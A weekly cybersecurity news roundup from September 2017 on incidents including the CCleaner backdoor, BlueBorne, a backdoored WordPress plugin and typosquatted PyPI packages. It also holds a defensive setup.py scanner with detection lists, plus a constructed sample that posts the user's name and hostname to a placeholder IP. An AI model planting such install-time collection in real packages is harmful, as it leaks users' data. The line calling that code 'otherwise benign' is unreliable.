18 September 2017

Week in review: major security incidents in September 11-17



- FireEye published a report on the growing number of attacks against cryptocurrency exchanges carried out by hackers from North Korea. The cybersecurity company's researchers have been tracking the hackers' activity since 2016. During that time the attackers compromised 4 wallets in Yapizon, 3 cryptocurrency exchanges in North Korea and a British news portal.

The hacking group TEMP.Hermit, believed to be linked to the North Korean government, is the main suspect.

- Check Point researchers Gal Elbaz and Dvir Atias discovered a new method that allows any ransomware to bypass modern security products. The technique, dubbed Bashware, abuses the WSL (Windows Subsystem for Linux) mechanism to run ELF and EXE malicious payloads, bypassing next-generation antivirus and anti-ransomware products.

- For the past 2 months, WordPress websites have been spreading a new backdoor.

Malicious code was detected in the Digital Widgets plugin for WordPress. By the time the malicious code was revealed, about 200,000 users who had installed the plugin were affected. The backdoor collected information about the system and passed it to external servers.

Investigations by security expert David Law and the companies White Fir Design and Wordfence showed that the person behind the plugin spam was Briton Mason Soiza. He bought the plugin on May 19, 2017, for $15,000 and released new backdoored versions throughout that period.


- Sophos revealed a new RAT, dubbed Kedi. The Trojan was delivered in phishing attacks via Gmail and used malicious payloads disguised as a Citrix utility.

Kedi's notable feature is its ability to communicate with its C&C over Gmail, DNS and HTTPS requests.

- Security experts identified 8 BlueBorne vulnerabilities affecting over 5 billion users. The flaws affect the Bluetooth implementations in Android, iOS, Microsoft and Linux and allow a remote attacker to compromise a system over Bluetooth.

- LinkedIn again became the target of malicious activity. Experts at Malwarebytes reported that attackers used previously compromised, long-standing and trusted accounts to spread phishing messages via the InMail feature, each containing a shared document and a malicious link. Following the link redirects the victim to a phishing page imitating Gmail or another email provider, which prompts the victim to log in. The total number of compromised accounts is currently unknown.

- The popular Dutch cryptocurrency exchange LiteBit.eu suffered a cyberattack for the second time. The first incident dates back to August 5.

In the end, the hackers accessed customers' personal information (email address, hashed password, IBANs, phone number, address and portfolio data), while no bitcoin was stolen. LiteBit's administration reported that it has already notified the police and the Dutch Data Protection Authority for investigation.

- During customer beta testing of Cisco Talos's new exploit detection technology, the security experts identified a two-stage backdoor in CCleaner v5.33. The compromised version was distributed by Avast from the official website repository and was signed with a valid certificate issued to Piriform Ltd. (the former owner of CCleaner). The incident was detected on September 12. The potential impact is enormous: as of November 2016, CCleaner had been downloaded over 2 billion times, with about 5 million new users every week.


- Russian-speaking hackers were observed using a new variant of the RouteX malware to infect Netgear routers and carry out attacks against Fortune 500 firms.

The malware was uncovered and analyzed by researchers at the US-based cybersecurity firm Forkbombus Labs. Experts link the activity to a Russian hacker known as Links.


- Kromtech discovered a publicly accessible database containing confidential information on 593,328 citizens (Alaska voters). The database belongs to TargetSmart, a leading provider of political data and technology. The exposure was caused by a CouchDB misconfiguration.

According to TargetSmart, the data leak was caused by inadequate data protection at Equals3, an AI software company based in Minnesota. Equals3 chief executive Dan Mallin stated that there is no evidence the information was accessed by anyone other than the Kromtech experts.

- OurMine continues to hit popular services. This time the hacking group compromised the American multinational video hosting service Vevo. The attackers published over 3 TB of office documents, videos and promotional materials. Vevo representatives confirmed the leak and suggested that the data were stolen as a result of a phishing attack via LinkedIn.

- Experts at the Slovak National Security Office (NBU) discovered ten malicious Python libraries uploaded to the PyPI repository. Because the service performs no security checks on newly uploaded packages, the malicious packages remained available from June until September of this year.

The hackers used a typosquatting technique to upload malicious Python libraries in which the installation script, setup.py, contained code that was otherwise benign.

The malicious code collects the name and version of the fake package, the username of the user who installed it and the computer's hostname, and sends this data to a Chinese IP address at "".
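Install-time collection of the installing user's name and hostname followed by a network call is the signal in the packages described above. As an added example (not the NBU's or PyPI's own tooling), the checker below parses a setup.py with the `ast` module, never executing it, and flags those signals; the sample setup.py is constructed and its IP comes from the documentation range.

```python
"""Static check for install-time data collection and network calls in setup.py.

Added example, not the NBU's or PyPI's tooling. The script is parsed, never run.
"""
import ast

# Fully qualified calls that read host/user identity at install time.
IDENTITY_CALLS = {"socket.gethostname", "getpass.getuser", "os.getlogin", "platform.node"}
# Modules whose import in setup.py suggests install-time network traffic.
NETWORK_MODULES = {"urllib", "urllib2", "urllib.request", "http.client",
                   "httplib", "requests", "socket"}
# Calls that actually open a connection.
NETWORK_CALLS = {"urllib.request.urlopen", "urllib2.urlopen", "requests.get",
                 "requests.post", "socket.create_connection"}

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_setup_py(source):
    """Return a sorted list of findings for the given setup.py source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in NETWORK_MODULES:
                    findings.add(f"network import: {alias.name}")
        elif isinstance(node, ast.ImportFrom) and node.module in NETWORK_MODULES:
            findings.add(f"network import: {node.module}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in IDENTITY_CALLS:
                findings.add(f"identity lookup: {name}")
            elif name in NETWORK_CALLS:
                findings.add(f"network call: {name}")
    return sorted(findings)

# Constructed sample mirroring the behaviour described in the roundup.
SAMPLE_SETUP_PY = '''
import socket, getpass
import urllib.request
from setuptools import setup
info = "%s %s %s@%s" % ("pkg", "1.0", getpass.getuser(), socket.gethostname())
urllib.request.urlopen("http://192.0.2.1/", data=info.encode())  # placeholder IP
setup(name="pkg", version="1.0")
'''
```

Running `scan_setup_py(SAMPLE_SETUP_PY)` on the constructed sample reports two identity lookups, one network call and two network imports, while a setup.py that only calls `setup()` yields no findings.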


- The Swiss government reported a cyberattack against the Swiss Defense Ministry. The incident was discovered in July. Experts found that the attackers used software belonging to the Turla malware family.

The government has not disclosed the origin of the attack or the actual damage it caused.

By Olga Vikiriuk
